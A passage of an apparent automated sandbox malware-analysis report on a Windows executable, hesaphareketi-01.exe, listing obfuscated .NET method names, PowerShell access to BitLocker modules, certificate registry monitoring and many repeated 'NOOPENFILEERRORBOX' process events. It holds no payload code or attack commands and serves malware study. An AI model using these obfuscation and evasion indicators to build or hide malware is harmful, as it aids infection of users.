                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, ekPH56jFBHPcSRygsU9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rGDRuGOgyt', 'JY1RdLCuGy', 'fwcRZCu45K', 'dSURC4IZcS', 'Ja8RgcARLX', 'mRcRMGsxnn', 'QcBRwQEtHB'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, BsutTpQm8aKu0PAwGq.csHigh entropy of concatenated method names: 'FcoIUHJ9pU', 'NT0Il8M77o', 'KR3I5Z5p4V', 'NBcIScu5Zs', 'aM1I1uCmVn', 'B2nIeg0AfX', 'Im6ITPi7J5', 'axvIaTLJBy', 'BkvI0ESD2d', 'Tc3I9fdhtC'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, w6oIrjjjrH6HSVsxJou.csHigh entropy of concatenated method names: 'ToString', 'bfWRFMR5hL', 'KGWRNnKnny', 'su8R2vr7Ar', 'UlCRhOvXhn', 'vgTRqDXl85', 'uQYRKUClcD', 'OH7R4jWkUl', 'prlEfOCG1InbX77IVTr', 'zvMFdxCzALKODgRGjEG'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.csHigh entropy of concatenated method names: 'CHkF2C8msq', 'CxYFhsTGxb', 'qvKFq9INku', 'bijFKUlgFN', 'krGF4HNJyx', 'fOJFcRtSJA', 'DKbFIhtXVw', 'bbYFAkLh7H', 'GotFnP628d', 'jgMFVpA01I'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, x42tUDawqVMVIAc1ru.csHigh entropy of concatenated method names: 'dyqquaE5xO', 'H2FqdtNPxY', 'xITqZQGgEq', 'mgFqCr1Tei', 'MyKqgDy1Tm', 'JHdqM3uCdc', 'Y9IqwFXjYv', 'UPpqBQQhAD', 'SUSqX6EGK8', 'zXCqLJPBWM'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, KMtGXDZWdhSH9pvSxH.csHigh entropy of concatenated method names: 'ToString', 'PW5YbughMM', 'EHeYWpOOkf', 'a6XYsCJW1L', 'zmiYoXiHcC', 'aY9YvLTMpT', 'FKAYOQB2Tf', 'WsQY30qtlE', 'CmwYH5c7VH', 'djVYQZh3Ft'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, BTpc3J7D3SBEyv9U7p.csHigh entropy of concatenated method names: 'rgq57vCpc', 'w31SVODfF', 'nVZebC1u8', 'y6QTF9PCV', 'YaL0DBsNM', 'ChD9UOvfo', 'SvUYG5pthpvtDTvu5H', 'iSdfnkj98oWKop00Bf', 'VXFiQJe71', 'JavRgyQTJ'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, KdjFA7JcmgyHHD8gwD.csHigh entropy of concatenated method names: 'Y0Uc24u9su', 'LivcqLdDBo', 's1fc4ow9NB', 'P9fcIYusyv', 'KYqcA90dZy', 'DvC4g0KK79', 'vQm4MeWeL1', 'GIw4wOOMim', 'WqV4BCjLds', 'V8L4X7El8L'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, Peg55JMlLh2fxtSMAh.csHigh entropy of concatenated method names: 'ppTDBeME1g', 'jR8DLMWwkJ', 'LsKirsFEDH', 'nKbij87e9J', 's4VDbR6oNP', 'c7bDy1VUFL', 'zFSDEK3SF0', 'CieDudkYTQ', 'xR6DdWSI0k', 'heADZHDjxu'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
